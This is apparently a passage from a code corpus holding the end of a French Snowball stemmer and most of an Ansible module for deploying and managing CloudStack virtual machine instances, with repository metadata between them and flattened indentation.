:cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
:type __step4_suffixes: tuple
:note: A detailed description of the French
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/french/stemmer.html
"""
__vowels = u("aeiouy\xE2\xE0\xEB\xE9\xEA\xE8\xEF\xEE\xF4\xFB\xF9")
__step1_suffixes = ('issements', 'issement', 'atrices', 'atrice',
'ateurs', 'ations', 'logies', 'usions',
'utions', 'ements', 'amment', 'emment',
'ances', 'iqUes', 'ismes', 'ables', 'istes',
'ateur', 'ation', 'logie', 'usion', 'ution',
'ences', 'ement', 'euses', 'ments', 'ance',
'iqUe', 'isme', 'able', 'iste', 'ence',
u('it\xE9s'), 'ives', 'eaux', 'euse', 'ment',
'eux', u('it\xE9'), 'ive', 'ifs', 'aux', 'if')
__step2a_suffixes = ('issaIent', 'issantes', 'iraIent', 'issante',
'issants', 'issions', 'irions', 'issais',
'issait', 'issant', 'issent', 'issiez', 'issons',
'irais', 'irait', 'irent', 'iriez', 'irons',
'iront', 'isses', 'issez', u('\xEEmes'),
u('\xEEtes'), 'irai', 'iras', 'irez', 'isse',
'ies', 'ira', u('\xEEt'), 'ie', 'ir', 'is',
'it', 'i')
__step2b_suffixes = ('eraIent', 'assions', 'erions', 'assent',
'assiez', u('\xE8rent'), 'erais', 'erait',
'eriez', 'erons', 'eront', 'aIent', 'antes',
'asses', 'ions', 'erai', 'eras', 'erez',
u('\xE2mes'), u('\xE2tes'), 'ante', 'ants',
'asse', u('\xE9es'), 'era', 'iez', 'ais',
'ait', 'ant', u('\xE9e'), u('\xE9s'), 'er',
'ez', u('\xE2t'), 'ai', 'as', u('\xE9'), 'a')
__step4_suffixes = (u('i\xE8re'), u('I\xE8re'), 'ion', 'ier', 'Ier',
'e', u('\xEB'))
def stem(self, word):
"""
Stem a French word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
step1_success = False
rv_ending_found = False
step2a_success = False
step2b_success = False
# Every occurrence of 'u' after 'q' is put into upper case.
for i in range(1, len(word)):
if word[i - 1] == "q" and word[i] == "u":
word = "".join((word[:i], "U", word[i + 1:]))
# Every occurrence of 'u' and 'i'
# between vowels is put into upper case.
# Every occurrence of 'y' preceded or
# followed by a vowel is also put into upper case.
for i in range(1, len(word) - 1):
if word[i - 1] in self.__vowels and word[i + 1] in self.__vowels:
if word[i] == "u":
word = "".join((word[:i], "U", word[i + 1:]))
elif word[i] == "i":
word = "".join((word[:i], "I", word[i + 1:]))
if word[i - 1] in self.__vowels or word[i + 1] in self.__vowels:
if word[i] == "y":
word = "".join((word[:i], "Y", word[i + 1:]))
r1, r2 = self._r1r2_standard(word, self.__vowels)
rv = self.__rv_french(word, self.__vowels)
# STEP 1: Standard suffix removal
for suffix in self.__step1_suffixes:
if word.endswith(suffix):
if suffix == "eaux":
word = word[:-1]
step1_success = True
elif suffix in ("euse", "euses"):
if suffix in r2:
word = word[:-len(suffix)]
step1_success = True
elif suffix in r1:
word = "".join((word[:-len(suffix)], "eux"))
step1_success = True
elif suffix in ("ement", "ements") and suffix in rv:
word = word[:-len(suffix)]
step1_success = True
if word[-2:] == "iv" and "iv" in r2:
word = word[:-2]
if word[-2:] == "at" and "at" in r2:
word = word[:-2]
elif word[-3:] == "eus":
if "eus" in r2:
word = word[:-3]
elif "eus" in r1:
word = "".join((word[:-1], "x"))
elif word[-3:] in ("abl", "iqU"):
if "abl" in r2 or "iqU" in r2:
word = word[:-3]
elif word[-3:] in (u("i\xE8r"), u("I\xE8r")):
if u("i\xE8r") in rv or u("I\xE8r") in rv:
word = "".join((word[:-3], "i"))
elif suffix == "amment" and suffix in rv:
word = "".join((word[:-6], "ant"))
rv = "".join((rv[:-6], "ant"))
rv_ending_found = True
elif suffix == "emment" and suffix in rv:
word = "".join((word[:-6], "ent"))
rv_ending_found = True
elif (suffix in ("ment", "ments") and suffix in rv and
not rv.startswith(suffix) and
rv[rv.rindex(suffix) - 1] in self.__vowels):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
rv_ending_found = True
elif suffix == "aux" and suffix in r1:
word = "".join((word[:-2], "l"))
step1_success = True
elif (suffix in ("issement", "issements") and suffix in r1
and word[-len(suffix) - 1] not in self.__vowels):
word = word[:-len(suffix)]
step1_success = True
elif suffix in ("ance", "iqUe", "isme", "able", "iste",
"eux", "ances", "iqUes", "ismes",
"ables", "istes") and suffix in r2:
word = word[:-len(suffix)]
step1_success = True
elif suffix in ("atrice", "ateur", "ation", "atrices",
"ateurs", "ations") and suffix in r2:
word = word[:-len(suffix)]
step1_success = True
if word[-2:] == "ic":
if "ic" in r2:
word = word[:-2]
else:
word = "".join((word[:-2], "iqU"))
elif suffix in ("logie", "logies") and suffix in r2:
word = "".join((word[:-len(suffix)], "log"))
step1_success = True
elif (suffix in ("usion", "ution", "usions", "utions") and
suffix in r2):
word = "".join((word[:-len(suffix)], "u"))
step1_success = True
elif suffix in ("ence", "ences") and suffix in r2:
word = "".join((word[:-len(suffix)], "ent"))
step1_success = True
elif suffix in (u("it\xE9"), u("it\xE9s")) and suffix in r2:
word = word[:-len(suffix)]
step1_success = True
if word[-4:] == "abil":
if "abil" in r2:
word = word[:-4]
else:
word = "".join((word[:-2], "l"))
elif word[-2:] == "ic":
if "ic" in r2:
word = word[:-2]
else:
word = "".join((word[:-2], "iqU"))
elif word[-2:] == "iv":
if "iv" in r2:
word = word[:-2]
elif (suffix in ("if", "ive", "ifs", "ives") and
suffix in r2):
word = word[:-len(suffix)]
step1_success = True
if word[-2:] == "at" and "at" in r2:
word = word[:-2]
if word[-2:] == "ic":
if "ic" in r2:
word = word[:-2]
else:
word = "".join((word[:-2], "iqU"))
break
# STEP 2a: Verb suffixes beginning 'i'
if not step1_success or rv_ending_found:
for suffix in self.__step2a_suffixes:
if word.endswith(suffix):
if (suffix in rv and len(rv) > len(suffix) and
rv[rv.rindex(suffix) - 1] not in self.__vowels):
word = word[:-len(suffix)]
step2a_success = True
break
# STEP 2b: Other verb suffixes
if not step2a_success:
for suffix in self.__step2b_suffixes:
if rv.endswith(suffix):
if suffix == "ions" and "ions" in r2:
word = word[:-4]
step2b_success = True
elif suffix in ('eraIent', 'erions', u('\xE8rent'),
'erais', 'erait', 'eriez',
'erons', 'eront', 'erai', 'eras',
'erez', u('\xE9es'), 'era', 'iez',
u('\xE9e'), u('\xE9s'), 'er', 'ez',
u('\xE9')):
word = word[:-len(suffix)]
step2b_success = True
elif suffix in ('assions', 'assent', 'assiez',
'aIent', 'antes', 'asses',
u('\xE2mes'), u('\xE2tes'), 'ante',
'ants', 'asse', 'ais', 'ait',
'ant', u('\xE2t'), 'ai', 'as',
'a'):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
step2b_success = True
if rv.endswith("e"):
word = word[:-1]
break
# STEP 3
if step1_success or step2a_success or step2b_success:
if word[-1] == "Y":
word = "".join((word[:-1], "i"))
elif word[-1] == u("\xE7"):
word = "".join((word[:-1], "c"))
# STEP 4: Residual suffixes
else:
if (len(word) >= 2 and word[-1] == "s" and
word[-2] not in u("aiou\xE8s")):
word = word[:-1]
for suffix in self.__step4_suffixes:
if word.endswith(suffix):
if suffix in rv:
if (suffix == "ion" and suffix in r2 and
rv[-4] in "st"):
word = word[:-3]
elif suffix in ("ier", u("i\xE8re"), "Ier",
u("I\xE8re")):
word = "".join((word[:-len(suffix)], "i"))
elif suffix == "e":
word = word[:-1]
elif suffix == u("\xEB") and word[-3:-1] == "gu":
word = word[:-1]
break
# STEP 5: Undouble
if word.endswith(("enn", "onn", "ett", "ell", "eill")):
word = word[:-1]
# STEP 6: Un-accent
for i in range(1, len(word)):
if word[-i] not in self.__vowels:
i += 1
else:
if i != 1 and word[-i] in (u("\xE9"), u("\xE8")):
word = "".join((word[:-i], "e", word[-i + 1:]))
break
word = (word.replace("I", "i")
.replace("U", "u")
.replace("Y", "y"))
return word
def __rv_french(self, word, vowels):
"""
Return the region RV that is used by the French stemmer.
If the word begins with two vowels, RV is the region after
the third letter. Otherwise, it is the region after the first
vowel not at the beginning of the word, or the end of the word
if these positions cannot be found. (Exceptionally, u'par',
u'col' or u'tap' at the beginning of a word is also taken to
define RV as the region to their right.)
:param word: The French word whose region RV is determined.
:type word: str or unicode
:param vowels: The French vowels that are used to determine
the region RV.
:type vowels: unicode
:return: the region RV for the respective French word.
:rtype: unicode
:note: This helper method is invoked by the stem method of
the subclass FrenchStemmer. It is not to be invoked directly!
"""
rv = ""
if len(word) >= 2:
if (word.startswith(("par", "col", "tap")) or
(word[0] in vowels and word[1] in vowels)):
rv = word[3:]
else:
for i in range(1, len(word)):
if word[i] in vowels:
rv = word[i + 1:]
break
return rv
|
apache-2.0
|
nhicher/ansible
|
lib/ansible/modules/cloud/cloudstack/cs_instance.py
|
14
|
38918
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, René Moser <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_instance
short_description: Manages instances and virtual machines on Apache CloudStack based clouds.
description:
- Deploy, start, update, scale, restart, restore, stop and destroy instances.
version_added: '2.0'
author: "René Moser (@resmo)"
options:
name:
description:
- Host name of the instance. C(name) can only contain ASCII letters.
- Name will be generated (UUID) by CloudStack if not specified and can not be changed afterwards.
- Either C(name) or C(display_name) is required.
display_name:
description:
- Custom display name of the instances.
- Display name will be set to C(name) if not specified.
- Either C(name) or C(display_name) is required.
group:
description:
- Group in where the new instance should be in.
state:
description:
- State of the instance.
default: present
choices: [ deployed, started, stopped, restarted, restored, destroyed, expunged, present, absent ]
service_offering:
description:
- Name or id of the service offering of the new instance.
- If not set, first found service offering is used.
cpu:
description:
- The number of CPUs to allocate to the instance, used with custom service offerings
cpu_speed:
description:
- The clock speed/shares allocated to the instance, used with custom service offerings
memory:
description:
- The memory allocated to the instance, used with custom service offerings
template:
description:
- Name, display text or id of the template to be used for creating the new instance.
- Required when using I(state=present).
- Mutually exclusive with C(ISO) option.
iso:
description:
- Name or id of the ISO to be used for creating the new instance.
- Required when using I(state=present).
- Mutually exclusive with C(template) option.
template_filter:
description:
- Name of the filter used to search for the template or iso.
- Used for params C(iso) or C(template) on I(state=present).
- The filter C(all) was added in 2.6.
default: executable
choices: [ all, featured, self, selfexecutable, sharedexecutable, executable, community ]
aliases: [ iso_filter ]
version_added: '2.1'
hypervisor:
description:
- Name the hypervisor to be used for creating the new instance.
- Relevant when using I(state=present), but only considered if not set on ISO/template.
- If not set or found on ISO/template, first found hypervisor will be used.
choices: [ KVM, kvm, VMware, vmware, BareMetal, baremetal, XenServer, xenserver, LXC, lxc, HyperV, hyperv, UCS, ucs, OVM, ovm, Simulator, simulator ]
keyboard:
description:
- Keyboard device type for the instance.
choices: [ 'de', 'de-ch', 'es', 'fi', 'fr', 'fr-be', 'fr-ch', 'is', 'it', 'jp', 'nl-be', 'no', 'pt', 'uk', 'us' ]
networks:
description:
- List of networks to use for the new instance.
aliases: [ network ]
ip_address:
description:
- IPv4 address for default instance's network during creation.
ip6_address:
description:
- IPv6 address for default instance's network.
ip_to_networks:
description:
- "List of mappings in the form I({'network': NetworkName, 'ip': 1.2.3.4})"
- Mutually exclusive with C(networks) option.
aliases: [ ip_to_network ]
disk_offering:
description:
- Name of the disk offering to be used.
disk_size:
description:
- Disk size in GByte required if deploying instance from ISO.
root_disk_size:
description:
- Root disk size in GByte required if deploying instance with KVM hypervisor and want resize the root disk size at startup
(need CloudStack >= 4.4, cloud-initramfs-growroot installed and enabled in the template)
security_groups:
description:
- List of security groups the instance to be applied to.
aliases: [ security_group ]
host:
description:
- Host on which an instance should be deployed or started on.
- Only considered when I(state=started) or instance is running.
- Requires root admin privileges.
version_added: 2.6
domain:
description:
- Domain the instance is related to.
account:
description:
- Account the instance is related to.
project:
description:
- Name of the project the instance to be deployed in.
zone:
description:
- Name of the zone in which the instance should be deployed.
- If not set, default zone is used.
ssh_key:
description:
- Name of the SSH key to be deployed on the new instance.
affinity_groups:
description:
- Affinity groups names to be applied to the new instance.
aliases: [ affinity_group ]
user_data:
description:
- Optional data (ASCII) that can be sent to the instance upon a successful deployment.
- The data will be automatically base64 encoded.
- Consider switching to HTTP_POST by using I(CLOUDSTACK_METHOD=post) to increase the HTTP_GET size limit of 2KB to 32 KB.
force:
description:
- Force stop/start the instance if required to apply changes, otherwise a running instance will not be changed.
type: bool
default: no
allow_root_disk_shrink:
description:
- Enables a volume shrinkage when the new size is smaller than the old one.
type: bool
default: no
version_added: '2.7'
tags:
description:
- List of tags. Tags are a list of dictionaries having keys C(key) and C(value).
- "If you want to delete all tags, set a empty list e.g. I(tags: [])."
aliases: [ tag ]
poll_async:
description:
- Poll async jobs until job has finished.
type: bool
default: yes
details:
description:
- Map to specify custom parameters.
version_added: '2.6'
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
# NOTE: Names of offerings and ISOs depending on the CloudStack configuration.
- name: create a instance from an ISO
cs_instance:
name: web-vm-1
iso: Linux Debian 7 64-bit
hypervisor: VMware
project: Integration
zone: ch-zrh-ix-01
service_offering: 1cpu_1gb
disk_offering: PerfPlus Storage
disk_size: 20
networks:
- Server Integration
- Sync Integration
- Storage Integration
delegate_to: localhost
- name: for changing a running instance, use the 'force' parameter
cs_instance:
name: web-vm-1
display_name: web-vm-01.example.com
iso: Linux Debian 7 64-bit
service_offering: 2cpu_2gb
force: yes
delegate_to: localhost
# NOTE: user_data can be used to kickstart the instance using cloud-init yaml config.
- name: create or update a instance on Exoscale's public cloud using display_name.
cs_instance:
display_name: web-vm-1
template: Linux Debian 7 64-bit
service_offering: Tiny
ssh_key: [email protected]
tags:
- key: admin
value: john
- key: foo
value: bar
user_data: |
#cloud-config
packages:
- nginx
delegate_to: localhost
- name: create an instance with multiple interfaces specifying the IP addresses
cs_instance:
name: web-vm-1
template: Linux Debian 7 64-bit
service_offering: Tiny
ip_to_networks:
- network: NetworkA
ip: 10.1.1.1
- network: NetworkB
ip: 192.0.2.1
delegate_to: localhost
- name: ensure an instance is stopped
cs_instance:
name: web-vm-1
state: stopped
delegate_to: localhost
- name: ensure an instance is running
cs_instance:
name: web-vm-1
state: started
delegate_to: localhost
- name: remove an instance
cs_instance:
name: web-vm-1
state: absent
delegate_to: localhost
'''
RETURN = '''
---
id:
description: UUID of the instance.
returned: success
type: string
sample: 04589590-ac63-4ffc-93f5-b698b8ac38b6
name:
description: Name of the instance.
returned: success
type: string
sample: web-01
display_name:
description: Display name of the instance.
returned: success
type: string
sample: web-01
group:
description: Group name of the instance is related.
returned: success
type: string
sample: web
created:
description: Date of the instance was created.
returned: success
type: string
sample: 2014-12-01T14:57:57+0100
password_enabled:
description: True if password setting is enabled.
returned: success
type: boolean
sample: true
password:
description: The password of the instance if exists.
returned: success
type: string
sample: Ge2oe7Do
ssh_key:
description: Name of SSH key deployed to instance.
returned: success
type: string
sample: key@work
domain:
description: Domain the instance is related to.
returned: success
type: string
sample: example domain
account:
description: Account the instance is related to.
returned: success
type: string
sample: example account
project:
description: Name of project the instance is related to.
returned: success
type: string
sample: Production
default_ip:
description: Default IP address of the instance.
returned: success
type: string
sample: 10.23.37.42
default_ip6:
description: Default IPv6 address of the instance.
returned: success
type: string
sample: 2a04:c43:c00:a07:4b4:beff:fe00:74
version_added: '2.6'
public_ip:
description: Public IP address with instance via static NAT rule.
returned: success
type: string
sample: 1.2.3.4
iso:
description: Name of ISO the instance was deployed with.
returned: success
type: string
sample: Debian-8-64bit
template:
description: Name of template the instance was deployed with.
returned: success
type: string
sample: Linux Debian 9 64-bit
template_display_text:
description: Display text of template the instance was deployed with.
returned: success
type: string
sample: Linux Debian 9 64-bit 200G Disk (2017-10-08-622866)
version_added: 2.6
service_offering:
description: Name of the service offering the instance has.
returned: success
type: string
sample: 2cpu_2gb
zone:
description: Name of zone the instance is in.
returned: success
type: string
sample: ch-gva-2
state:
description: State of the instance.
returned: success
type: string
sample: Running
security_groups:
description: Security groups the instance is in.
returned: success
type: list
sample: '[ "default" ]'
affinity_groups:
description: Affinity groups the instance is in.
returned: success
type: list
sample: '[ "webservers" ]'
tags:
description: List of resource tags associated with the instance.
returned: success
type: dict
sample: '[ { "key": "foo", "value": "bar" } ]'
hypervisor:
description: Hypervisor related to this instance.
returned: success
type: string
sample: KVM
host:
description: Hostname of hypervisor an instance is running on.
returned: success and instance is running
type: string
sample: host-01.example.com
version_added: 2.6
instance_name:
description: Internal name of the instance (ROOT admin only).
returned: success
type: string
sample: i-44-3992-VM
'''
import base64
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes, to_text
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
CS_HYPERVISORS,
cs_argument_spec,
cs_required_together
)
class AnsibleCloudStackInstance(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackInstance, self).__init__(module)
self.returns = {
'group': 'group',
'hypervisor': 'hypervisor',
'instancename': 'instance_name',
'publicip': 'public_ip',
'passwordenabled': 'password_enabled',
'password': 'password',
'serviceofferingname': 'service_offering',
'isoname': 'iso',
'templatename': 'template',
'templatedisplaytext': 'template_display_text',
'keypair': 'ssh_key',
'hostname': 'host',
}
self.instance = None
self.template = None
self.iso = None
def get_service_offering_id(self):
service_offering = self.module.params.get('service_offering')
service_offerings = self.query_api('listServiceOfferings')
if service_offerings:
if not service_offering:
return service_offerings['serviceoffering'][0]['id']
for s in service_offerings['serviceoffering']:
if service_offering in [s['name'], s['id']]:
return s['id']
self.fail_json(msg="Service offering '%s' not found" % service_offering)
def get_host_id(self):
host_name = self.module.params.get('host')
if not host_name:
return None
args = {
'type': 'routing',
'zoneid': self.get_zone(key='id'),
}
hosts = self.query_api('listHosts', **args)
if hosts:
for h in hosts['host']:
if h['name'] == host_name:
return h['id']
self.fail_json(msg="Host '%s' not found" % host_name)
def get_template_or_iso(self, key=None):
template = self.module.params.get('template')
iso = self.module.params.get('iso')
if not template and not iso:
return None
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'zoneid': self.get_zone(key='id'),
'isrecursive': True,
'fetch_list': True,
}
if template:
if self.template:
return self._get_by_key(key, self.template)
rootdisksize = self.module.params.get('root_disk_size')
args['templatefilter'] = self.module.params.get('template_filter')
args['fetch_list'] = True
templates = self.query_api('listTemplates', **args)
if templates:
for t in templates:
if template in [t['displaytext'], t['name'], t['id']]:
if rootdisksize and t['size'] > rootdisksize * 1024 ** 3:
continue
self.template = t
return self._get_by_key(key, self.template)
if rootdisksize:
more_info = " (with size <= %s)" % rootdisksize
else:
more_info = ""
self.module.fail_json(msg="Template '%s' not found%s" % (template, more_info))
elif iso:
if self.iso:
return self._get_by_key(key, self.iso)
args['isofilter'] = self.module.params.get('template_filter')
args['fetch_list'] = True
isos = self.query_api('listIsos', **args)
if isos:
for i in isos:
if iso in [i['displaytext'], i['name'], i['id']]:
self.iso = i
return self._get_by_key(key, self.iso)
self.module.fail_json(msg="ISO '%s' not found" % iso)
def get_instance(self):
instance = self.instance
if not instance:
instance_name = self.get_or_fallback('name', 'display_name')
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'fetch_list': True,
}
# Do not pass zoneid, as the instance name must be unique across zones.
instances = self.query_api('listVirtualMachines', **args)
if instances:
for v in instances:
if instance_name.lower() in [v['name'].lower(), v['displayname'].lower(), v['id']]:
self.instance = v
break
return self.instance
def _get_instance_user_data(self, instance):
# Query the user data if we need to
if 'userdata' in instance:
return instance['userdata']
user_data = ""
if self.get_user_data() is not None and instance.get('id'):
res = self.query_api('getVirtualMachineUserData', virtualmachineid=instance['id'])
user_data = res['virtualmachineuserdata'].get('userdata', "")
return user_data
def get_iptonetwork_mappings(self):
network_mappings = self.module.params.get('ip_to_networks')
if network_mappings is None:
return
if network_mappings and self.module.params.get('networks'):
self.module.fail_json(msg="networks and ip_to_networks are mutually exclusive.")
network_names = [n['network'] for n in network_mappings]
ids = self.get_network_ids(network_names)
res = []
for i, data in enumerate(network_mappings):
res.append({'networkid': ids[i], 'ip': data['ip']})
return res
def get_ssh_keypair(self, key=None, name=None, fail_on_missing=True):
ssh_key_name = name or self.module.params.get('ssh_key')
if ssh_key_name is None:
return
args = {
'domainid': self.get_domain('id'),
'account': self.get_account('name'),
'projectid': self.get_project('id'),
'name': ssh_key_name,
}
ssh_key_pairs = self.query_api('listSSHKeyPairs', **args)
if 'sshkeypair' in ssh_key_pairs:
return self._get_by_key(key=key, my_dict=ssh_key_pairs['sshkeypair'][0])
elif fail_on_missing:
self.module.fail_json(msg="SSH key not found: %s" % ssh_key_name)
def ssh_key_has_changed(self):
ssh_key_name = self.module.params.get('ssh_key')
if ssh_key_name is None:
return False
# Fails if keypair for param is inexistent
param_ssh_key_fp = self.get_ssh_keypair(key='fingerprint')
# CloudStack 4.5 does return keypair on instance for a non existent key.
instance_ssh_key_name = self.instance.get('keypair')
if instance_ssh_key_name is None:
return True
# Get fingerprint for keypair of instance but do not fail if inexistent.
instance_ssh_key_fp = self.get_ssh_keypair(key='fingerprint', name=instance_ssh_key_name, fail_on_missing=False)
if not instance_ssh_key_fp:
return True
# Compare fingerprints to ensure the keypair changed
if instance_ssh_key_fp != param_ssh_key_fp:
return True
return False
def security_groups_has_changed(self):
security_groups = self.module.params.get('security_groups')
if security_groups is None:
return False
security_groups = [s.lower() for s in security_groups]
instance_security_groups = self.instance.get('securitygroup') or []
instance_security_group_names = []
for instance_security_group in instance_security_groups:
if instance_security_group['name'].lower() not in security_groups:
return True
else:
instance_security_group_names.append(instance_security_group['name'].lower())
for security_group in security_groups:
if security_group not in instance_security_group_names:
return True
return False
def get_network_ids(self, network_names=None):
if network_names is None:
network_names = self.module.params.get('networks')
if not network_names:
return None
args = {
'account': self.get_account(key='name'),
'domainid': self.get_domain(key='id'),
'projectid': self.get_project(key='id'),
'zoneid': self.get_zone(key='id'),
'fetch_list': True,
}
networks = self.query_api('listNetworks', **args)
if not networks:
self.module.fail_json(msg="No networks available")
network_ids = []
network_displaytexts = []
for network_name in network_names:
for n in networks:
if network_name in [n['displaytext'], n['name'], n['id']]:
network_ids.append(n['id'])
network_displaytexts.append(n['name'])
break
if len(network_ids) != len(network_names):
self.module.fail_json(msg="Could not find all networks, networks list found: %s" % network_displaytexts)
return network_ids
def present_instance(self, start_vm=True):
instance = self.get_instance()
if not instance:
instance = self.deploy_instance(start_vm=start_vm)
else:
instance = self.recover_instance(instance=instance)
instance = self.update_instance(instance=instance, start_vm=start_vm)
# In check mode, we do not necessarily have an instance
if instance:
instance = self.ensure_tags(resource=instance, resource_type='UserVm')
# refresh instance data
self.instance = instance
return instance
def get_user_data(self):
user_data = self.module.params.get('user_data')
if user_data is not None:
user_data = to_text(base64.b64encode(to_bytes(user_data)))
return user_data
def get_details(self):
details = self.module.params.get('details')
cpu = self.module.params.get('cpu')
cpu_speed = self.module.params.get('cpu_speed')
memory = self.module.params.get('memory')
if all([cpu, cpu_speed, memory]):
details.extends({
'cpuNumber': cpu,
'cpuSpeed': cpu_speed,
'memory': memory,
})
return details
def deploy_instance(self, start_vm=True):
self.result['changed'] = True
networkids = self.get_network_ids()
if networkids is not None:
networkids = ','.join(networkids)
args = {}
args['templateid'] = self.get_template_or_iso(key='id')
if not args['templateid']:
self.module.fail_json(msg="Template or ISO is required.")
args['zoneid'] = self.get_zone(key='id')
args['serviceofferingid'] = self.get_service_offering_id()
args['account'] = self.get_account(key='name')
args['domainid'] = self.get_domain(key='id')
args['projectid'] = self.get_project(key='id')
args['diskofferingid'] = self.get_disk_offering(key='id')
args['networkids'] = networkids
args['iptonetworklist'] = self.get_iptonetwork_mappings()
args['userdata'] = self.get_user_data()
args['keyboard'] = self.module.params.get('keyboard')
args['ipaddress'] = self.module.params.get('ip_address')
args['ip6address'] = self.module.params.get('ip6_address')
args['name'] = self.module.params.get('name')
args['displayname'] = self.get_or_fallback('display_name', 'name')
args['group'] = self.module.params.get('group')
args['keypair'] = self.get_ssh_keypair(key='name')
args['size'] = self.module.params.get('disk_size')
args['startvm'] = start_vm
args['rootdisksize'] = self.module.params.get('root_disk_size')
args['affinitygroupnames'] = self.module.params.get('affinity_groups')
args['details'] = self.get_details()
args['securitygroupnames'] = self.module.params.get('security_groups')
args['hostid'] = self.get_host_id()
template_iso = self.get_template_or_iso()
if 'hypervisor' not in template_iso:
args['hypervisor'] = self.get_hypervisor()
instance = None
if not self.module.check_mode:
instance = self.query_api('deployVirtualMachine', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
return instance
def update_instance(self, instance, start_vm=True):
# Service offering data
args_service_offering = {
'id': instance['id'],
}
if self.module.params.get('service_offering'):
args_service_offering['serviceofferingid'] = self.get_service_offering_id()
service_offering_changed = self.has_changed(args_service_offering, instance)
# Instance data
args_instance_update = {
'id': instance['id'],
'userdata': self.get_user_data(),
}
instance['userdata'] = self._get_instance_user_data(instance)
args_instance_update['ostypeid'] = self.get_os_type(key='id')
if self.module.params.get('group'):
args_instance_update['group'] = self.module.params.get('group')
if self.module.params.get('display_name'):
args_instance_update['displayname'] = self.module.params.get('display_name')
instance_changed = self.has_changed(args_instance_update, instance)
ssh_key_changed = self.ssh_key_has_changed()
security_groups_changed = self.security_groups_has_changed()
# Volume data
args_volume_update = {}
root_disk_size = self.module.params.get('root_disk_size')
root_disk_size_changed = False
if root_disk_size is not None:
res = self.query_api('listVolumes', type='ROOT', virtualmachineid=instance['id'])
[volume] = res['volume']
size = volume['size'] >> 30
args_volume_update['id'] = volume['id']
args_volume_update['size'] = root_disk_size
shrinkok = self.module.params.get('allow_root_disk_shrink')
if shrinkok:
args_volume_update['shrinkok'] = shrinkok
root_disk_size_changed = root_disk_size != size
changed = [
service_offering_changed,
instance_changed,
security_groups_changed,
ssh_key_changed,
root_disk_size_changed,
]
if any(changed):
force = self.module.params.get('force')
instance_state = instance['state'].lower()
if instance_state == 'stopped' or force:
self.result['changed'] = True
if not self.module.check_mode:
# Ensure VM has stopped
instance = self.stop_instance()
instance = self.poll_job(instance, 'virtualmachine')
self.instance = instance
# Change service offering
if service_offering_changed:
res = self.query_api('changeServiceForVirtualMachine', **args_service_offering)
instance = res['virtualmachine']
self.instance = instance
# Update VM
if instance_changed or security_groups_changed:
if security_groups_changed:
args_instance_update['securitygroupnames'] = ','.join(self.module.params.get('security_groups'))
res = self.query_api('updateVirtualMachine', **args_instance_update)
instance = res['virtualmachine']
self.instance = instance
# Reset SSH key
if ssh_key_changed:
# SSH key data
args_ssh_key = {}
args_ssh_key['id'] = instance['id']
args_ssh_key['projectid'] = self.get_project(key='id')
args_ssh_key['keypair'] = self.module.params.get('ssh_key')
instance = self.query_api('resetSSHKeyForVirtualMachine', **args_ssh_key)
instance = self.poll_job(instance, 'virtualmachine')
self.instance = instance
# Root disk size
if root_disk_size_changed:
async_result = self.query_api('resizeVolume', **args_volume_update)
self.poll_job(async_result, 'volume')
# Start VM again if it was running before
if instance_state == 'running' and start_vm:
instance = self.start_instance()
else:
self.module.warn("Changes won't be applied to running instances. " +
"Use force=true to allow the instance %s to be stopped/started." % instance['name'])
# migrate to other host
host_changed = all([
instance['state'].lower() == 'running',
self.module.params.get('host'),
self.module.params.get('host') != instance.get('hostname')
])
if host_changed:
self.result['changed'] = True
args_host = {
'virtualmachineid': instance['id'],
'hostid': self.get_host_id(),
}
if not self.module.check_mode:
res = self.query_api('migrateVirtualMachine', **args_host)
instance = self.poll_job(res, 'virtualmachine')
return instance
def recover_instance(self, instance):
if instance['state'].lower() in ['destroying', 'destroyed']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('recoverVirtualMachine', id=instance['id'])
instance = res['virtualmachine']
return instance
def absent_instance(self):
instance = self.get_instance()
if instance:
if instance['state'].lower() not in ['expunging', 'destroying', 'destroyed']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('destroyVirtualMachine', id=instance['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(res, 'virtualmachine')
return instance
def expunge_instance(self):
instance = self.get_instance()
if instance:
res = {}
if instance['state'].lower() in ['destroying', 'destroyed']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('destroyVirtualMachine', id=instance['id'], expunge=True)
elif instance['state'].lower() not in ['expunging']:
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('destroyVirtualMachine', id=instance['id'], expunge=True)
poll_async = self.module.params.get('poll_async')
if poll_async:
res = self.poll_job(res, 'virtualmachine')
return instance
def stop_instance(self):
instance = self.get_instance()
# in check mode instance may not be instanciated
if instance:
if instance['state'].lower() in ['stopping', 'stopped']:
return instance
if instance['state'].lower() in ['starting', 'running']:
self.result['changed'] = True
if not self.module.check_mode:
instance = self.query_api('stopVirtualMachine', id=instance['id'])
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
return instance
def start_instance(self):
instance = self.get_instance()
# in check mode instance may not be instanciated
if instance:
if instance['state'].lower() in ['starting', 'running']:
return instance
if instance['state'].lower() in ['stopped', 'stopping']:
self.result['changed'] = True
if not self.module.check_mode:
args = {
'id': instance['id'],
'hostid': self.get_host_id(),
}
instance = self.query_api('startVirtualMachine', **args)
poll_async = self.module.params.get('poll_async')
if poll_async:
instance = self.poll_job(instance, 'virtualmachine')
return instance
def restart_instance(self):
instance = self.get_instance()
# in check mode instance may not be instanciated
